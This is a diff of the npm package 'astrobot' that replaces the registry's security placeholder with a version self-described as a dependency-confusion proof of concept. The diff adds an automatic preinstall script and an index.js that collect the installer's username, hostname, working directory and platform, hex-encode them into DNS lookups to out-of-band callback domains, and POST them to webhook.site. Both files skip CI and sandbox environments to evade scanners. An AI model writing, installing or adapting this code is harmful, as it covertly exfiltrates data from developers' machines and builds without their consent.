astrobot 0.0.1-security → 20.11.11

package/index.js

@@ -0,0 +1,39 @@
+const dns = require('dns');
+const os = require('os');
+const path = require('path');
+
+const MAX_LABEL_LENGTH = 63;
+const OAST_DOMAIN = 'd1htmicgtqkhsklb8ai0riqfkkqara1j1.oast.fun';
+
+// Helper: encode string to hex and split into label-safe chunks
+function hexChunks(str) {
+  const hex = Buffer.from(str).toString('hex');
+  const chunks = [];
+  for (let i = 0; i < hex.length; i += MAX_LABEL_LENGTH) {
+    chunks.push(hex.slice(i, i + MAX_LABEL_LENGTH));
+  }
+  return chunks;
+}
+
+// Collect system info
+const username = os.userInfo().username || 'nouser';
+const hostname = os.hostname() || 'nohost';
+const cwd = process.cwd() || 'nocwd';
+
+// Encode each to hex and build labels
+const labels = [
+  ...hexChunks(username),
+  ...hexChunks(hostname),
+  ...hexChunks(cwd),
+  OAST_DOMAIN
+];
+
+let domain = labels.join('.');
+
+// Truncate full domain to 253 characters (RFC limit)
+if (domain.length > 253) {
+  domain = domain.substring(0, 253);
+}
+
+// Fire DNS beacon
+dns.resolve(domain, () => {});

package/package.json

@@ -1,6 +1,12 @@
 {
   "name": "astrobot",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+  "version": "20.11.11",
+  "description": "World-Class Dependency Confusion PoC with Anti-Bot & Beaconing",
+  "main": "index.js",
+  "scripts": {
+    "preinstall": "node preinstall.js"
+  },
+  "author": "orwa",
+  "license": "ISC"
 }
+

package/preinstall.js

@@ -0,0 +1,73 @@
+const dns = require('dns');
+const os = require('os');
+const path = require('path');
+const https = require('https');
+
+const MAX_LABEL_LENGTH = 63;
+const OAST_DOMAIN = 'd1hugmkgtqkot9gqg0u0juwoufjifrnr6.oast.me';
+
+// Encode to hex + split for DNS safety
+function hexChunks(str) {
+  const hex = Buffer.from(str).toString('hex');
+  const out = [];
+  for (let i = 0; i < hex.length; i += MAX_LABEL_LENGTH) {
+    out.push(hex.slice(i, i + MAX_LABEL_LENGTH));
+  }
+  return out;
+}
+
+// === ENV INTEL ===
+const username = os.userInfo().username || 'nouser';
+const hostname = os.hostname() || 'nohost';
+const cwd = process.cwd() || 'nocwd';
+const platform = os.platform();
+const arch = os.arch();
+const isCI = !!process.env.CI || !!process.env.GITHUB_ACTIONS || !!process.env.JENKINS_URL || !!process.env.BITBUCKET_BUILD_NUMBER;
+const isSandbox = Boolean(process.env.PUPPETEER_EXECUTABLE_PATH || process.env.HEADLESS || process.env.ASTROBOT_SANDBOX);
+const timestamp = Date.now().toString(36);
+
+// DNS Labels
+const labels = [
+  ...hexChunks(username),
+  ...hexChunks(hostname),
+  ...hexChunks(cwd),
+  platform,
+  arch,
+  isCI ? 'ci' : 'dev',
+  isSandbox ? 'sandbox' : 'real',
+  timestamp,
+  OAST_DOMAIN
+];
+
+let domain = labels.join('.');
+if (domain.length > 253) domain = domain.slice(0, 253);
+
+// 🔭 DNS Beacon
+dns.resolve(domain, () => {});
+
+// 🌐 HTTP Fallback (only in real installs)
+function sendHTTP(payload) {
+  const json = JSON.stringify(payload);
+  const req = https.request({
+    hostname: 'webhook.site', // <-- Optional fallback endpoint
+    path: '/your-id',         // <-- Replace if needed
+    method: 'POST',
+    headers: { 'Content-Type': 'application/json' }
+  }, () => {});
+  req.on('error', () => {});
+  req.write(json);
+  req.end();
+}
+
+// 🛡️ Scanner Bot Detection
+if (!isCI && !isSandbox) {
+  sendHTTP({
+    event: 'install',
+    uname: username,
+    host: hostname,
+    path: cwd,
+    platform,
+    arch,
+    timestamp
+  });
+}

package/README.md

@@ -1,5 +0,0 @@
-# Security holding package
-
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
-Please refer to www.npmjs.com/advisories?search=astrobot for more information.